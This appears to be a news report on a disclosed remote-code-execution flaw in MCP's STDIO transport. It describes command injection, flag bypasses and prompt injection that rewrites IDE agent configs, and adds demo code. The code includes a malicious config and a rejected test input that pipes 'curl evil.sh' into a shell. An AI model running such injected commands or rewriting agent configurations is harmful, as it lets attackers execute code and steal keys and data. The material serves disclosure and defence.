MCP Protocol Reveals Design-Level RCE Vulnerability, Anthropic Refuses to Change Architecture
According to monitoring by Dongcha Beating, security firm OX Security recently disclosed a design-level remote code execution (RCE) vulnerability in the Model Context Protocol (MCP), the open protocol led by Anthropic that has become the de facto standard for AI agents calling external tools. Attackers can execute arbitrary commands on any system running a vulnerable MCP implementation, potentially accessing user data, internal databases, API keys, and chat logs.

The vulnerability does not stem from coding errors by implementers but from the default behavior of Anthropic's official SDKs when handling the STDIO transport; the Python, TypeScript, Java, and Rust SDKs are all affected. STDIO is an MCP transport that lets local processes communicate through standard input and output. The SDK's StdioServerParameters launches subprocesses directly from the command parameters in the configuration, meaning that if developers do not perform additional input sanitization, any user input that reaches this point can become a system command.

OX Security groups the attack surface into four types: direct command injection through the configuration interface; bypassing sanitization by passing flags to an allowed command (e.g., npx -c); injecting prompts in IDEs to rewrite MCP configuration files, which lets tools like Windsurf run malicious STDIO servers without user interaction; and covertly injecting STDIO configurations through HTTP requests in the MCP marketplace.

OX Security reports that the affected packages have been downloaded over 150 million times, with more than 7,000 publicly accessible MCP servers and up to 200,000 exposed instances across over 200 open-source projects. The team has submitted over 30 responsible disclosures and received more than 10 high or critical CVEs, covering AI frameworks and IDEs including LiteLLM, LangFlow, Flowise, Windsurf, GPT Researcher, Agent Zero, and DocsGPT.
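The vulnerable pattern can be sketched roughly as follows. This is a hypothetical simplification, not the actual MCP SDK code: a StdioServerParameters-style configuration dict carries "command" and "args" fields that are handed straight to a subprocess launch, so any attacker-controlled value reaching the config runs as a system command.

```python
import subprocess
import sys

# Hypothetical sketch of the pattern described above, NOT the real SDK:
# the config's "command" and "args" fields go directly into a subprocess
# launch with no sanitization in between.
def launch_stdio_server(config: dict) -> subprocess.Popen:
    # Vulnerable default: whatever reaches config["command"] is executed.
    return subprocess.Popen(
        [config["command"], *config.get("args", [])],
        stdout=subprocess.PIPE,
        text=True,
    )

# An attacker-controlled config turns the "server" into arbitrary code
# (sys.executable stands in for any interpreter on the victim's machine):
malicious = {"command": sys.executable, "args": ["-c", "print('pwned')"]}
proc = launch_stdio_server(malicious)
print(proc.communicate()[0].strip())  # -> pwned
```

The same shape explains why the issue spans four SDK languages: it is the transport's launch semantics, not any one implementation bug.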
In testing 11 MCP package repositories, OX Security found 9 vulnerable to this method of injecting malicious configurations. After the disclosure, Anthropic responded that the behavior is 'by design', calling STDIO's execution model a 'secure default', and placed responsibility for input sanitization on developers, declining to make changes at the protocol or official SDK level. Vendors such as DocsGPT and LettaAI have issued their own patches, while the default behavior of Anthropic's reference implementation remains unchanged. MCP has become the de facto standard for AI agents interfacing with external tools, with OpenAI, Google, and Microsoft all adopting it. Without a fix at the root, any MCP service that uses the official SDK's default STDIO handling, even one whose developer has not written a single line of erroneous code, can become an attack vector.
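Since Anthropic places sanitization on developers, one plausible mitigation is to validate STDIO configs against an allowlist of complete invocations, command and flags together, because the article notes that allowing a bare command such as npx still permits injection through flags like npx -c. The sketch below is a hypothetical illustration, not a vendor patch; the allowlist entry is an invented example.

```python
import shlex

# Hypothetical allowlist of full invocations (command + all arguments).
# Checking only the command name would still allow flag-based bypasses
# such as `npx -c <shell code>`.
ALLOWED_INVOCATIONS = {
    ("npx", "-y", "@modelcontextprotocol/server-filesystem"),  # example entry
}

def validate_stdio_config(config: dict) -> tuple:
    """Reject any STDIO config whose exact argv is not allowlisted."""
    invocation = (config.get("command", ""), *config.get("args", []))
    if invocation not in ALLOWED_INVOCATIONS:
        raise ValueError(f"rejected STDIO invocation: {shlex.join(invocation)}")
    return invocation

# Allowed: the exact invocation matches an allowlist entry.
validate_stdio_config(
    {"command": "npx", "args": ["-y", "@modelcontextprotocol/server-filesystem"]}
)

# Blocked: same command, different flags -> ValueError.
try:
    validate_stdio_config({"command": "npx", "args": ["-c", "curl evil.sh | sh"]})
except ValueError as e:
    print(e)
```

Matching on the full argv tuple is deliberately strict; looser schemes (prefix matching, regex filters) reintroduce exactly the flag-bypass class the disclosure describes.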